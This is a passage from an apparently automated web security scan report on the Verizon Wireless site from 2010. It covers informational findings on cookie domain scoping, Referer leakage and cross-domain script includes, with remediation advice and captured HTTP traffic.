A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /b2c/index.html HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:38:51 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GLOBALID=RKn%2BoQVp8VV4LuzvNA00RedqiB73Is%2FrdrsiPXoeN9KL2yyW%2Bmry0Q9JORO%2BJI8J; domain=.verizonwireless.com; expires=Sunday, 20-Nov-2011 01:38:51 GMT; path=/
Set-Cookie: JSESSIONIDB2C=1zL6MnmLbfFKV9WSHvDlDR4dcsgJ9RT60zd20hnSQyWYF9lgXWH2!390044835!venus!5106!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NSC_xxx_xmt_c2d_mcwt=44ac3f0c25c2;path=/
Content-Length: 27628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" la
...[SNIP]...

4. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


4.1. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:38:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217138196; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   
       <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/layout.css" />
   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/fonts.css" />
<link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/ecom.css" />
   
   <link rel="stylesheet" type="text/css" href="https://ecache.vzw.com/imageFiles/Myacct/gn/css/vzw_jquery.css" />
   <link rel="stylesheet" type="text/css" href="https://ecache.vzw.com/imageFiles/Myacct/gn/css/globalnav.css" />
   <link rel="stylesheet" href="https://scache.vzw.com/globalnav/css/globalnav-js.css" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="https://scache.vzw.com/stylesheets/accessiblePrint.css" />

   <script type="text/javascript">
...[SNIP]...
</script>
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js"></script>
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>


   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/onlineopinionOO4S/oo_style.css" />
<script language="javascript" type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionOO4S/oo_engine_c.js"></script>

   
       <script language="javascript" type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionOO4S/oo_conf_en-US_float.js"></script>
   

                               <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="https://scache.vzw.com/scripts/accessible/vzwFlashDetector.js"></script>
...[SNIP]...
</span>


                                               <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
       <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
           
           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="https://scache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>
           
           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="https://scache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>
           
           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="https://scache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="https://scache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>


   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script language="javascript" type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...

4.2. http://www.verizonwireless.com/b2c/vzwfly  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/vzwfly

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b2c/vzwfly?go=/ContactUsControllerServlet HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://aboutus.vzw.com/leadership/executive/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df; SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; TIME_CHECKER=1290217138069; __utma=96859928.604975816.1290217110.1290217110.1290217110.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1290217110.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:39:07 GMT
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   
       <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/layout.css" />
   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/fonts.css" />
<link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/ecom.css" />
   
   <link rel="stylesheet" type="text/css" href="https://ecache.vzw.com/imageFiles/Myacct/gn/css/vzw_jquery.css" />
   <link rel="stylesheet" type="text/css" href="https://ecache.vzw.com/imageFiles/Myacct/gn/css/globalnav.css" />
   <link rel="stylesheet" href="https://scache.vzw.com/globalnav/css/globalnav-js.css" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="https://scache.vzw.com/stylesheets/accessiblePrint.css" />

   <script type="text/javascript">
...[SNIP]...
</script>
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js"></script>
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>


   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/onlineopinionOO4S/oo_style.css" />
<script language="javascript" type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionOO4S/oo_engine_c.js"></script>

   
       <script language="javascript" type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionOO4S/oo_conf_en-US_float.js"></script>
   

                               <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="https://scache.vzw.com/scripts/accessible/vzwFlashDetector.js"></script>
...[SNIP]...
</span>


                                               <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
       <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
           
           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="https://scache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>
           
           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="https://scache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>
           
           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="https://scache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="https://scache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>


   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script language="javascript" type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...

5. Cross-domain script include  previous
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://www.verizonwireless.com/b2c/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/index.html HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:38:51 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GLOBALID=RKn%2BoQVp8VV4LuzvNA00RedqiB73Is%2FrdrsiPXoeN9KL2yyW%2Bmry0Q9JORO%2BJI8J; domain=.verizonwireless.com; expires=Sunday, 20-Nov-2011 01:38:51 GMT; path=/
Set-Cookie: JSESSIONIDB2C=1zL6MnmLbfFKV9WSHvDlDR4dcsgJ9RT60zd20hnSQyWYF9lgXWH2!390044835!venus!5106!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NSC_xxx_xmt_c2d_mcwt=44ac3f0c25c2;path=/
Content-Length: 27628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" la
...[SNIP]...
</script>
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js"></script>
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>


   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/onlineopinionOO4S/oo_style.css" />
<script language="javascript" type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionOO4S/oo_engine_c.js"></script>

   
       <script language="javascript" type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionOO4S/oo_conf_en-US_float.js"></script>
   

                               <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>
   

       <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="https://scache.vzw.com/scripts/accessible/vzwFlashDetector.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script language="javascript" type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...

5.2. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:38:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217138196; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
</script>
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js"></script>
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>


   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/onlineopinionOO4S/oo_style.css" />
<script language="javascript" type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionOO4S/oo_engine_c.js"></script>

   
       <script language="javascript" type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionOO4S/oo_conf_en-US_float.js"></script>
   

                               <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="https://scache.vzw.com/scripts/accessible/vzwFlashDetector.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script language="javascript" type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...

5.3. http://www.verizonwireless.com/b2c/vzwfly  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/vzwfly

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/vzwfly?go=/ContactUsControllerServlet HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://aboutus.vzw.com/leadership/executive/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx_hwt=ec2016f80000; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; JSESSIONIDB2C=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1; NSC_xxx_xmt_c2d_mcwt=44ac3f0d25df; SESSION_VALUE=Gh9nMnmL11xTTHL7LDVGFcCDpnlRydc1lJhhX2cm4wqp2f4WLLsH!-1044347078!saturn!5103!-1!1290217131032; TIME_CHECKER=1290217138069; __utma=96859928.604975816.1290217110.1290217110.1290217110.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1290217110.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:39:07 GMT
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
</script>
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js"></script>
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>


   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/onlineopinionOO4S/oo_style.css" />
<script language="javascript" type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionOO4S/oo_engine_c.js"></script>

   
       <script language="javascript" type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionOO4S/oo_conf_en-US_float.js"></script>
   

                               <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="https://scache.vzw.com/scripts/accessible/vzwFlashDetector.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script language="javascript" type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...

Report generated by Hoyt LLC Research at Fri Nov 19 22:05:14 CST 2010.